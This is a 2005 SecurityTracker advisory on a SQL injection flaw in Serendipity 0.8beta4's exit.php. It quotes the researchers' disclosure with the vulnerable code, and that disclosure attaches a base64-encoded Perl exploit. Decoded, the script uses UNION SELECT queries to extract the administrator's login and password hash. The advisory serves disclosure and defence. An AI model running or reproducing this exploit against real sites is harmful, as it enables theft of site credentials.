Serendipity Input Validation Error in 'exit.php' Permits SQL Injection Attacks
|
|
SecurityTracker Alert ID: 1013699 |
|
SecurityTracker URL: http://securitytracker.com/id/1013699
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 14 2005
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 0.8beta4
|
Description:
An input validation vulnerability was reported in Serendipity. A remote user can inject SQL commands.
The 'exit.php' script does not properly validate user-supplied input in the 'url_id' and 'entry_id' parameters. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
ADZ Security Team reported this vulnerability.
|
Impact:
A remote user can execute SQL commands on the underlying database.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.s9y.org/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 13 Apr 2005 20:22:05 +0400
Subject: serendipity SQL Injection vulnerability
|
This is a multi-part message in MIME format.
--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
ADZ Security Team
===================
Info
Program: serentdipity web blog system
Version: 0.8beta4
Module: exit.php
Bug type: SQL Injection
Vendor site: http://www.s9y.org/
Vendor Informed: Yes
===================
Bug Info
// code start
//.......
$links = serendipity_db_query("SELECT link FROM
{$serendipity['dbPrefix']}references WHERE id = {$_GET['url_id']} AND
entry_id = {$_GET['entry_id']}", true);
//.......
// no checks here...
//.......
if (is_array($links) && isset($links['link'])) {
// URL is valid. Track it.
$url = $links['link'];
}
//......
if (serendipity_isResponseClean($url)) {
header('HTTP/1.0 301 Moved Permanently');
header('Location: ' . $url);
}
//......
// code end
As we see, if we insert some "bad" sql-code into $_GET['url_id'] or
$_GET['entry_id'], server returns in header "Location: xxxx", where is
possible to be an account login/passwd hash :)
Sorry my english :)
Exploit/PoC:
See exploit in attached adz_serendipity.pl
===================
Contact
ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n@mail.ru, adz.kreon@gmail.com (for non-russian users)
--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.
Content-Type: application/octet-stream;
name="adz_serendipity.pl"
Content-Disposition: attachment;
filename="adz_serendipity.pl"
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9wZXJsCiMgU2VyZW5kaXBpdHkgMC44YmV0YTQgZXhpdC5waHAgU1FMIEluamVj
dGlvbiBleHBsb2l0CiMgKGMpIEFEWiBTZWN1cml0eSBUZWFtIDIwMDQtMjAwNQojIChjKSBrcmVv
biAyMDA1CiMgaHR0cDovL2Fkei52b2lkLnJ1LwojIGtyZTBuQG1haWwucnUKIyBQdWJsaWMgOikK
CnByaW50ICJcblxuIjsKcHJpbnQgIiMgU2VyZW5kaXBpdHkgMC44YmV0YTQgZXhpdC5waHAgU1FM
IEluamVjdGlvbiBleHBsb2l0XG4iOwpwcmludCAiIyAoQykgQURaIFNlY3VyaXR5IFRlYW0gMjAw
NC0yMDA1XG4iOwpwcmludCAiIyAoQykga3Jlb24gMjAwNVxuIjsKCnVzZSBJTzo6U29ja2V0Owp1
c2UgR2V0b3B0OjpTdGQ7CgpnZXRvcHQoImg6ZDpwOnQ6Iik7Cgokb3B0X3AgfHw9IDgwOwokb3B0
X2QgfHw9ICIvIjsKJG9wdF90IHx8PSAic2VyZW5kaXBpdHlfIjsKCmlmKCEkb3B0X2gpIHsKICAg
IGRpZSgiIyBVc2FnZTogJDAgLWggPGhvc3Q+IFstZCA8ZGlyPl0gWy1wIDxwb3J0Pl0gWy10IHRh
YmxlX3ByZWZpeF1cbiIpOwp9Cgokc3FscGFzcyA9ICI/ZW50cnlfaWQ9MSZ1cmxfaWQ9MSUyMFVO
SU9OJTIwU0VMRUNUJTIwcGFzc3dvcmQlMjBGUk9NJTIwIi4kb3B0X3QuImF1dGhvcnMlMjBXSEVS
RSUyMHVzZXJsZXZlbD0yNTUvKiI7CiRzcWxsb2dpbiA9ICI/ZW50cnlfaWQ9MSZ1cmxfaWQ9MSUy
MFVOSU9OJTIwU0VMRUNUJTIwdXNlcm5hbWUlMjBGUk9NJTIwIi4kb3B0X3QuImF1dGhvcnMlMjBX
SEVSRSUyMHVzZXJsZXZlbD0yNTUvKiI7CgpwcmludCAiIyBIb3N0OiAkb3B0X2hcbiI7CnByaW50
ICIjIERpcjogJG9wdF9kXG4iOwpwcmludCAiIyBQb3J0OiAkb3B0X3BcbiI7CnByaW50ICIjIFBy
ZWZpeDogJG9wdF90XG4iOwoKJFExID0gIkdFVCAiLiRvcHRfZC4iL2V4aXQucGhwIi4kc3FsbG9n
aW4uIiBIVFRQLzEuMFxuIjsKJFExIC49ICJIb3N0OiAiLiRvcHRfaC4iXG5cbiI7CgokUTIgPSAi
R0VUICIuJG9wdF9kLiIvZXhpdC5waHAiLiRzcWxwYXNzLiIgSFRUUC8xLjBcbiI7CiRRMiAuPSAi
SG9zdDogIi4kb3B0X2guIlxuXG4iOwoKJHMgPSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJvdG8g
PT4gJ3RjcCcsIFBlZXJBZGRyID0+ICRvcHRfaCwgUGVlclBvcnQgPT4gJG9wdF9wKSBvciBkaWUo
IkNhbid0IGNvbm5lY3QhIik7CiRzLT5zZW5kKCRRMSk7CiRzLT5yZWN2KCR0eHQsIDEwMjQpOwpp
ZigkdHh0ID1+IG0vbG9jYXRpb246IChcUyspL2kpIHsKICAgICRsb2dpbiA9ICAkMTsKfQoKJHMg
PSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJvdG89Pid0Y3AnLCBQZWVyQWRkciA9PiAkb3B0X2gs
IFBlZXJQb3J0ID0+ICRvcHRfcCkgb3IgZGllKCJDYW4ndCBjb25uZWN0ISIpOwokcy0+c2VuZCgk
UTIpOwokcy0+cmVjdigkdHh0LCAxMDI0KTsKaWYoJHR4dCA9fiBtL2xvY2F0aW9uOiAoXFMrKS9p
KSB7CiAgICAkcGFzcyA9ICQxOwp9CmlmKCEkbG9naW4gfHwgISRwYXNzIHx8ICRsb2dpbiA9fiBt
L2h0dHA6XC9cLy9pIHx8ICRwYXNzID1+IG0vaHR0cDpcL1wvL2kpIHsKICAgIHByaW50ICIjIEZh
aWxlZCA6KFxuIjsKICAgIGV4aXQ7Cn0KCnByaW50ICIjIFN1Y2NlZWQgOilcbiI7CnByaW50ICIj
IExvZ2luOiAkbG9naW5cbiI7CnByaW50ICIjIFBhc3MgSGFzaDogJHBhc3NcbiI7CnByaW50ICJc
biI7
--Multipart=_Wed__13_Apr_2005_20_22_05_+0400_d.JEscg.7oMaye=.--
|
|
